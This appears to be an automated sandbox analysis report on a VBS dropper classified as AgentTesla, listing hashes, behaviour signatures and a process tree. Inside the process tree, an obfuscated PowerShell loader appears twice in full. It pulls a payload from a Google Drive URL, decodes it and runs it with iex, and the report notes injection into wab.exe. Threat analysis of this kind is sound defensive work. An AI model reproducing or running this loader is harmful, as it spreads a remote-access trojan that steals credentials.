Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 06:41

General

  • Target

    101764ZAM2024.vbs

  • Size

    4KB

  • MD5

    da84b84acab58afbc2549d0313d7a27d

  • SHA1

    f9b2f7c8a1095a0a92b1c11ffad1db6f3e60ddcd

  • SHA256

    b4f1081d88ac2d9a768d94a5aa3c685644835336f5642637005b4f74db407a94

  • SHA512

    ed14edb9c28960454971bc4766109cff1e3195258fb1c2c15d25ec61592c49cef9b5afe01ca477254f73d16b81c0b9a2093bb35fb78861ae11e98876e96a3029

  • SSDEEP

    96:QSUGGWOfwEq8apLbxVgsUkx0PONZDYwAqn/Q6oej2EjsCXdLKUfp:QS7GWC6Lb7dFGWNZDzhnouj2EQCXFbfp

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\101764ZAM2024.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Slipsloppism='Sub';$Slipsloppism+='strin';$Lgelige = 1;$Slipsloppism+='g';Function Floskulatur($Erigeronnderzonen){$Perfected=$Erigeronnderzonen.Length-$Lgelige;For($Erigeron=1;$Erigeron -lt $Perfected;$Erigeron+=2){$Tressels+=$Erigeronnderzonen.$Slipsloppism.Invoke( $Erigeron, $Lgelige);}$Tressels;}function Posrs($Homme){. ($Pinier69) ($Homme);}$Delkoral=Floskulatur ' MPoNz i l l a / 5e.T0j J(.W iRnMd oRw sC NIT 1,0n.K0I;K WHiSn 6 4.; x 6,4 ;F ,rSvS:.1 2F1F. 0 )D SGFe.c k oI/ 2.0C1B0S0G1M0A1T UF iSr eAfSo x./ 1 2 1F.B0D ';$ophedning=Floskulatur 'NU s eCrS- ASgCeFnFtP ';$Festligstes=Floskulatur 'Sh t.tsp s : /./,d.rGiRvTeN.,gWoBo gAl e .Tc o.mU/Pu cR?OeJxNpTo,rIt,=RdEo w nAlDonaId,&,i,d.=T1 6DtPb XF4 oGYIG sT4,4Iv,R NTDDjCJ,otABp 8 _ CIPAz.d.V,crwS0 QMo, ';$Transpirer=Floskulatur 'S> ';$Pinier69=Floskulatur 'di.e.xG ';$Molekyle='Ejerpantebreve';$Hungerramt = Floskulatur ' e,c hUo .% a p pMd aSt,a % \ T o r nGtPaFpFp,eSn .FI,nOf. H&F& KeFc hDo BtA ';Posrs (Floskulatur ' $Sg,l.oKbDa.lK:STGewt rSascLaCr,b,oSx,y l.iSc =s(AcFmNdP C/IcP $OH u n,g eKr,r.agmKt ) ');Posrs (Floskulatur '.$Rg l.o b a l,: G r.o,u,n.dtwGoZrNkP=I$TF,e,s t,lBi.gAs,tUeLs,.Us.pEl,i.t (,$MTCr aBnMsPpGiFreeUr.). ');$Festligstes=$Groundwork[0];$Tystner= (Floskulatur 'B$GgMl,o,bTaDlT: KEi w i eQn,s 1,1 =FN.e w.-,O b,jMe c tS ,S y s tSe.m . NDeHtS.MWMe b C lSi e.n t');$Tystner+=$Tetracarboxylic[1];Posrs ($Tystner);Posrs (Floskulatur 'R$.KSi w.i.eAnAs,1R1I.HHDeLaSdFeMrRsM[M$ oCpah e.d.nYi n,gS],=D$ DLeFlTkwoSrIa l ');$Sommerstvne=Floskulatur '.$BKSiJwBi e,n sR1I1 .PDRoSwDn.l oea,dAFSiPl eW(H$BFIe s t l iAgks tLeTsA,T$ KuaPfTf eTp.uCn.cRhg)G ';$Kaffepunch=$Tetracarboxylic[0];Posrs (Floskulatur '.$Pg lAo.bEa lE: DPi.dBdSl,iSeBs =E( T e s tG- P.aKt,h. G$ K,aPfTf,eLpCu,n cLhL)V ');while (!$Diddlies) {Posrs (Floskulatur ' $bg.l,o,bEaKlr: A nIt i,eRmdpTeArBoWr 3.=E$.t,rDu eC ') ;Posrs $Sommerstvne;Posrs (Floskulatur ' S tNa r tI-AS.l.eSe p S4b ');Posrs (Floskulatur ' $Og,l o bAa lW:FD i dLd,l i eFsP=.( THeGs,t - P aKtLh $ Kda f f.e p,u nKcWh )c ') ;Posrs (Floskulatur 'H$Pg,lso b aMl.:,PNr e e n l i sDtMm.eDnAt sB=.$,gBl oSbKaPl : S e r fUaBgme,sU+F+ %U$DG rBoRu.n.dLw oLr kU.Pc.o u n.tO ') ;$Festligstes=$Groundwork[$Preenlistments];}$blomstergartnere=344026;$Antioxidizings=25954;Posrs (Floskulatur ' $,g l o bAaOlH: UBdAn.vMn t e,s, ,=F GBe.t - CKo nStDeLnBt, P$,K aUf f eSpSu n cRhO ');Posrs (Floskulatur 'I$ g lNo bda.lI:KNUaDvUe tSt e S= H[OSJy,s.tVePmR.JC,oBnBv,e.r,tD] : :SFTrGoFmCB aPsOeF6S4aSStVr iNnRgS(I$DUOdAn vFn tSe sS)P ');Posrs (Floskulatur 'S$ g.lCoAbMaCl,:AP r o.g r aRm mGrMePr n e, .= S[,S yAs.t eBm . TTe.x tP.DEFn c o d,iEn gS]i:N:TA SPCMIcIS.FG e t STt r i n g.(,$ NMa.v e,tMtBe,)R ');Posrs (Floskulatur ' $,gSl o bAaSlS:,K a a.rFeFn d.eSsB1,0,=O$,PSrIo,g rRaPmUm r e r n eV.,sSuBb sRtUrTi nNg ( $Bb lIoVmIsSt,eAr.gRa,rKt,n.e rKeA, $FA,n.tHiSoOxRiCd.i z iDnDg s.)P ');Posrs $Kaarendes10;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Torntappen.Inf && echo t"
        3⤵
          PID:1620
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Slipsloppism='Sub';$Slipsloppism+='strin';$Lgelige = 1;$Slipsloppism+='g';Function Floskulatur($Erigeronnderzonen){$Perfected=$Erigeronnderzonen.Length-$Lgelige;For($Erigeron=1;$Erigeron -lt $Perfected;$Erigeron+=2){$Tressels+=$Erigeronnderzonen.$Slipsloppism.Invoke( $Erigeron, $Lgelige);}$Tressels;}function Posrs($Homme){. ($Pinier69) ($Homme);}$Delkoral=Floskulatur ' MPoNz i l l a / 5e.T0j J(.W iRnMd oRw sC NIT 1,0n.K0I;K WHiSn 6 4.; x 6,4 ;F ,rSvS:.1 2F1F. 0 )D SGFe.c k oI/ 2.0C1B0S0G1M0A1T UF iSr eAfSo x./ 1 2 1F.B0D ';$ophedning=Floskulatur 'NU s eCrS- ASgCeFnFtP ';$Festligstes=Floskulatur 'Sh t.tsp s : /./,d.rGiRvTeN.,gWoBo gAl e .Tc o.mU/Pu cR?OeJxNpTo,rIt,=RdEo w nAlDonaId,&,i,d.=T1 6DtPb XF4 oGYIG sT4,4Iv,R NTDDjCJ,otABp 8 _ CIPAz.d.V,crwS0 QMo, ';$Transpirer=Floskulatur 'S> ';$Pinier69=Floskulatur 'di.e.xG ';$Molekyle='Ejerpantebreve';$Hungerramt = Floskulatur ' e,c hUo .% a p pMd aSt,a % \ T o r nGtPaFpFp,eSn .FI,nOf. H&F& KeFc hDo BtA ';Posrs (Floskulatur ' $Sg,l.oKbDa.lK:STGewt rSascLaCr,b,oSx,y l.iSc =s(AcFmNdP C/IcP $OH u n,g eKr,r.agmKt ) ');Posrs (Floskulatur '.$Rg l.o b a l,: G r.o,u,n.dtwGoZrNkP=I$TF,e,s t,lBi.gAs,tUeLs,.Us.pEl,i.t (,$MTCr aBnMsPpGiFreeUr.). ');$Festligstes=$Groundwork[0];$Tystner= (Floskulatur 'B$GgMl,o,bTaDlT: KEi w i eQn,s 1,1 =FN.e w.-,O b,jMe c tS ,S y s tSe.m . NDeHtS.MWMe b C lSi e.n t');$Tystner+=$Tetracarboxylic[1];Posrs ($Tystner);Posrs (Floskulatur 'R$.KSi w.i.eAnAs,1R1I.HHDeLaSdFeMrRsM[M$ oCpah e.d.nYi n,gS],=D$ DLeFlTkwoSrIa l ');$Sommerstvne=Floskulatur '.$BKSiJwBi e,n sR1I1 .PDRoSwDn.l oea,dAFSiPl eW(H$BFIe s t l iAgks tLeTsA,T$ KuaPfTf eTp.uCn.cRhg)G ';$Kaffepunch=$Tetracarboxylic[0];Posrs (Floskulatur '.$Pg lAo.bEa lE: DPi.dBdSl,iSeBs =E( T e s tG- P.aKt,h. G$ K,aPfTf,eLpCu,n cLhL)V ');while (!$Diddlies) {Posrs (Floskulatur ' $bg.l,o,bEaKlr: A nIt i,eRmdpTeArBoWr 3.=E$.t,rDu eC ') ;Posrs $Sommerstvne;Posrs (Floskulatur ' S tNa r tI-AS.l.eSe p S4b ');Posrs (Floskulatur ' $Og,l o bAa lW:FD i dLd,l i eFsP=.( THeGs,t - P aKtLh $ Kda f f.e p,u nKcWh )c ') ;Posrs (Floskulatur 'H$Pg,lso b aMl.:,PNr e e n l i sDtMm.eDnAt sB=.$,gBl oSbKaPl : S e r fUaBgme,sU+F+ %U$DG rBoRu.n.dLw oLr kU.Pc.o u n.tO ') ;$Festligstes=$Groundwork[$Preenlistments];}$blomstergartnere=344026;$Antioxidizings=25954;Posrs (Floskulatur ' $,g l o bAaOlH: UBdAn.vMn t e,s, ,=F GBe.t - CKo nStDeLnBt, P$,K aUf f eSpSu n cRhO ');Posrs (Floskulatur 'I$ g lNo bda.lI:KNUaDvUe tSt e S= H[OSJy,s.tVePmR.JC,oBnBv,e.r,tD] : :SFTrGoFmCB aPsOeF6S4aSStVr iNnRgS(I$DUOdAn vFn tSe sS)P ');Posrs (Floskulatur 'S$ g.lCoAbMaCl,:AP r o.g r aRm mGrMePr n e, .= S[,S yAs.t eBm . TTe.x tP.DEFn c o d,iEn gS]i:N:TA SPCMIcIS.FG e t STt r i n g.(,$ NMa.v e,tMtBe,)R ');Posrs (Floskulatur ' $,gSl o bAaSlS:,K a a.rFeFn d.eSsB1,0,=O$,PSrIo,g rRaPmUm r e r n eV.,sSuBb sRtUrTi nNg ( $Bb lIoVmIsSt,eAr.gRa,rKt,n.e rKeA, $FA,n.tHiSoOxRiCd.i z iDnDg s.)P ');Posrs $Kaarendes10;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3960
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Torntappen.Inf && echo t"
            4⤵
              PID:1020
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2624

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eq0l5jv4.dot.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Torntappen.Inf
        Filesize

        481KB

        MD5

        af362ac0f71c354e02c2f692a94d3755

        SHA1

        f6667c8657dce705f35731ec0cda5bcea418826c

        SHA256

        ab4a7ac83a0974c4125388864e9552d5d9693937da3f438d98489cc725e4d4e9

        SHA512

        c4a3dfd681a1b6a40a12434d52030854d677780d00a65e970082bd004058fb74c80901bcdbfb439734d286a4e4e174f17a994a5b483c7eb016e7d45018a92de2

      • memory/2216-58-0x00007FFA179D0000-0x00007FFA18491000-memory.dmp
        Filesize

        10.8MB

      • memory/2216-11-0x00007FFA179D0000-0x00007FFA18491000-memory.dmp
        Filesize

        10.8MB

      • memory/2216-12-0x00007FFA179D0000-0x00007FFA18491000-memory.dmp
        Filesize

        10.8MB

      • memory/2216-0-0x00007FFA179D3000-0x00007FFA179D5000-memory.dmp
        Filesize

        8KB

      • memory/2216-1-0x00000176FF260000-0x00000176FF282000-memory.dmp
        Filesize

        136KB

      • memory/2216-40-0x00007FFA179D0000-0x00007FFA18491000-memory.dmp
        Filesize

        10.8MB

      • memory/2216-39-0x00007FFA179D3000-0x00007FFA179D5000-memory.dmp
        Filesize

        8KB

      • memory/2624-62-0x0000000023460000-0x000000002346A000-memory.dmp
        Filesize

        40KB

      • memory/2624-61-0x0000000023560000-0x00000000235F2000-memory.dmp
        Filesize

        584KB

      • memory/2624-60-0x0000000023470000-0x00000000234C0000-memory.dmp
        Filesize

        320KB

      • memory/2624-54-0x00000000005C0000-0x0000000001814000-memory.dmp
        Filesize

        18.3MB

      • memory/2624-55-0x00000000005C0000-0x0000000000602000-memory.dmp
        Filesize

        264KB

      • memory/3960-17-0x0000000004EB0000-0x0000000004ED2000-memory.dmp
        Filesize

        136KB

      • memory/3960-34-0x0000000007100000-0x0000000007196000-memory.dmp
        Filesize

        600KB

      • memory/3960-35-0x0000000007090000-0x00000000070B2000-memory.dmp
        Filesize

        136KB

      • memory/3960-36-0x00000000082F0000-0x0000000008894000-memory.dmp
        Filesize

        5.6MB

      • memory/3960-33-0x00000000063F0000-0x000000000640A000-memory.dmp
        Filesize

        104KB

      • memory/3960-38-0x00000000088A0000-0x000000000C45A000-memory.dmp
        Filesize

        59.7MB

      • memory/3960-32-0x00000000076C0000-0x0000000007D3A000-memory.dmp
        Filesize

        6.5MB

      • memory/3960-31-0x0000000005E90000-0x0000000005EDC000-memory.dmp
        Filesize

        304KB

      • memory/3960-30-0x0000000005E50000-0x0000000005E6E000-memory.dmp
        Filesize

        120KB

      • memory/3960-29-0x0000000005960000-0x0000000005CB4000-memory.dmp
        Filesize

        3.3MB

      • memory/3960-21-0x00000000057F0000-0x0000000005856000-memory.dmp
        Filesize

        408KB

      • memory/3960-18-0x0000000005780000-0x00000000057E6000-memory.dmp
        Filesize

        408KB

      • memory/3960-16-0x0000000004FA0000-0x00000000055C8000-memory.dmp
        Filesize

        6.2MB

      • memory/3960-15-0x00000000048B0000-0x00000000048E6000-memory.dmp
        Filesize

        216KB